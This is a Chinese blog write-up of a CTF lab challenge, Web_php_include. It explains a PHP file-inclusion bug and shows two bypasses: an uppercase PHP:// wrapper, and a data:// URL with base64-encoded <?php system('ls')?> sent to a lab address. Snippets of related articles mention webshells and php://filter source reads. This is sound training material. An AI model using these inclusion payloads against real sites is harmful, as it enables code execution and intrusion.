攻防世界:WEB——Web_php_include

最新推荐文章于 2023-05-04 15:07:39 发布
最新推荐文章于 2023-05-04 15:07:39 发布
阅读量440 收藏 3
点赞数
分类专栏: 网络安全学习 刷题
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZripenYe/article/details/119739387
版权

借鉴了别人的博客:https://www.cnblogs.com/xhds/p/12218471.html但是还是要自己总结一下

起名纯娱乐

源代码是这样的

<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
    $page=str_replace("php://", "", $page);
}
include($page);
?>

这里有几个函数,解释一下:

  • show_source(__FILE__); show_source() 函数对文件进行语法高亮显示。这个函数是 highlight_file() 的别名,所以这个函数对解题无意义。
  • strstr()函数:查找字符串的首次出现,这里是在page字符串里面找查“php://”首次出现的位置。它的返回值是返回从"php://"之后所有的字符串。但是它对大小写敏感。
  • str_replace():将$page里面的“php://”字符串用“”代替,如果这个东西过滤掉了“php://”,那么就不能传递有效参数给include

方法1:瞒天过海

由于strstr()这个函数对大小写敏感,所以我们可以换成PHP://的形式

这个方法我在Chrome和Edge上都没有用,不知道为什么,但是在火狐浏览器上有效
世界上第三大浏览器并没有消亡!

在这里插入图片描述

再传参访问那个长得像flag的PHP文件即可
在这里插入图片描述
恩?没用?
按照惯例,一般喜欢藏在注释里:
在这里插入图片描述

ctf{876a5fca-96c6-4cbd-9075-46f0c89475d2}

方法2:假一赔十

自 PHP 5.2.0 起 data:数据流封装器开始有效。
这个data按照我的理解,就是利用base64编码可以进行post传递参数
因为data不会被过滤,所以非常有效
方法如下:

data://text/plain;base64,xxxx(base64编码后的数据)

所以利用notepad++的base64编码

  • 将命令<?php system("ls")?>编码为PD9waHAgc3lzdGVtKCJscyIpPz4
http://111.200.241.244:56179/?page=data://text/plain/;base64,PD9waHAgc3lzdGVtKCJscyIpPz4

Zeker62
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
【CTF | 网络安全】攻防世界 Web_php_includephp伪协议|data伪协议|file伪协议】
等风来
05-22 9105
该题考察文件包含漏洞,涉及PHP伪协议data伪协议file伪协议及PHP内置函数等知识点,希望读者躬身实践。我是秋说,我们下次见。
攻防世界 supersqli writeup
12-14
进入题目查看源码,提到sqlmap那就扫一扫 发现有注入,注入点为injiect=2’,接下来–dbs尝试查询数据库,只爆出supersqli,但无法爆出表。 回到题目 order by 判断只有两个字段(别人的writerup说–+被过滤,只能使用#,不知道为什么没有,最后发现是在查询框里过滤了,在url框里没有) 在使用union select时发现过滤关键字 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200313161718411.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpd
攻防世界:适合作为桌面
10-08
攻防世界:适合作为桌面,misc 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127215689
黑客攻防技术宝典:Web实战篇(第2版)1
08-03
前言第1章 Web应用程序安全与风险1.1 Web应用程序的发展历程1.1.1 Web应用程序的常见功能1.1.2 Web应用程序的优点1.2 Web应用程序安
攻防世界-Web_php_include (四种解法)
笑花大王
01-20 4464
攻防世界-Web_php_include (考察的是文件包含) 打开页面是这样一段代码从代码中得知page中带有php://的都会被替换成空 str_replace()以其他字符替换字符串中的一些字符(区分大小写) strstr() 查找字符串首次出现的位置。返回字符串剩余部分 <?php show_source(__FILE__); echo $_GET['hello'];...
攻防世界Web_php_include详解
weixin_63810302的博客
06-21 4243
ctf学习记录
攻防世界-web-Web_php_include(文件包含与伪协议)
最新发布
2301_77300311的博客
05-04 556
先进行base64编码再urlencode后,构造data://伪协议,payload如下。strstr() 函数搜索字符串在另一字符串中是否存在,如果是,返回该字符串及剩余部分,否则返回 FALSE。由于strstr()函数和函数都是区分大小写的,那么我们完全可以使用大写的PHP://来绕过过滤。既然过滤了php://的伪协议,我们可以使用其他协议,这里使用data://伪协议。从代码中得知,page参数中带有php://的都会被替换成空。方法三(php://伪协议、大小写过滤)方法二(御剑+菜刀)
ctf-攻防世界-webWeb_php_include
一只菜鸟的博客
11-21 5666
先看题目标题,php_include,猜测为文件包含漏洞。 打开环境,看到这样一段代码:
攻防世界Web_php_include
2202_75317918的博客
04-13 826
攻防世界Web_php_include
攻防世界】四、Web_php_include
Hi~ 土拨鼠
01-20 419
步骤 打开所给的实验环境,发现给出代码,分析代码可知是文件包含漏洞: 其中含有两个参数: hello参数中的内容会被输出到页面 page参数中的内容则会被进行文件包含,但是会对php://进行过滤 两个函数: strstr(string,search[,before_search]):strstr() 函数搜索字符串(search)在另一字符串(string)中是否存在,如果是,返回该字符串及剩余部分,否则返回 FALSE。区分大小写,stristr()函数不区分大小写。 string:必需。规定.
awd攻防比赛总结——3s_NwGeek.docx
09-30
awd攻防比赛总结——3s_NwGeek.docx
吴翰清:白帽子讲Web安全
02-21
安全宝副总裁、前阿里巴巴集团高级安全专家吴翰清将携他的《白帽子讲Web安全》一书做客问答栏目。以下为采访正文:吴翰清(刺哥/总,大风哥),安全宝副总裁,前阿里巴巴集团高级安全专家。毕业于西安交通大学少年班...
web应用安全攻防策略.doc
11-21
web应用安全攻防策略.doc
安全客2020季刊第三季:新基建___国计民生下的工控攻防升级.pdf
08-11
污点传递理论在 Webshell 检测中的应用——PHP 篇 情报界在对抗社交媒体干扰活动中的作用 使用 CodeQL 分析闭源 Java 程序 设备指纹指南 探索 MITRE Shield 如何用于主动防御 When TLS Hacks You——BlackHat2020 ...
文件源码读取 php伪协议,include(文件包含漏洞,php伪协议)
weixin_39969257的博客
03-18 911
点击tips查看元素,也并没有有用的信息,联想到题目,include想起了文件包含漏洞。构造payload?file=/../../../../../../flag.php没有返回东西。看完wq学到了一个新姿势:php伪代码构造payload?file=php://filter/read=convert.base64-encode/resource=flag.php得到base64加密后的flag...
include详解 shell_详解php文件包含原理(读取文件源码、图片马、各种协议、远程getshell等) ......
weixin_39584571的博客
12-20 841
详解php文件包含原理(读取文件源码、图片马、各种协议、远程getshell等)作者是namezz(看完图相当于做了一轮实验系列)现有文件代码如下includeinclude_once、require、require_once用处差不多,故只举include例说明。话不多说,开始正文。(正文太啰嗦了,直接看总结吧)功能说明分别包含aaa和zzz,效果如下图所示读取到zzz文件的内容<?ph...
攻防世界Web_php_include
金 帛的博客
02-16 672
攻防世界WP
攻防世界(web篇)---Web_php_include
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
06-07 3330
hello传值 phpmyadmin写马 phpmyadmin变量secure_file_priv值为空,说明可以写入一句话木马 传🐎成功 测试🐎php://input 可以访问请求的原始数据的只读流, 将post请求中的数据作为PHP代码执行利用该方法,我们可以直接写入php文件,输入file=php://input,然后使用burp抓包,写入php代码: file://协议 用于访问本地文件系统,不受allow_url_fopen与allow_url_include的影响即file:// [文..
攻防世界 web php include,攻防世界-Web_php_include (四种解法)
weixin_36035466的博客
03-09 297
攻防世界-Web_php_include (考察的是文件包含)打开页面是这样一段代码从代码中得知page中带有php://的都会被替换成空str_replace()以其他字符替换字符串中的一些字符(区分大小写)strstr() 查找字符串首次出现的位置。返回字符串剩余部分}include($page);?>分析代码可知程序过滤掉了page=参数传入php://第一种方法(大小写绕过)大小...
攻防世界web_php_include
03-16
攻防世界中的 web_php_include 是一种漏洞,它指的是在 PHP 程序中使用 include 或 require 语句加载文件时可能存在的安全问题。这种漏洞可能导致远程代码执行攻击,允许攻击者在服务器上执行任意代码。为了防止这种...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Zeker62

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值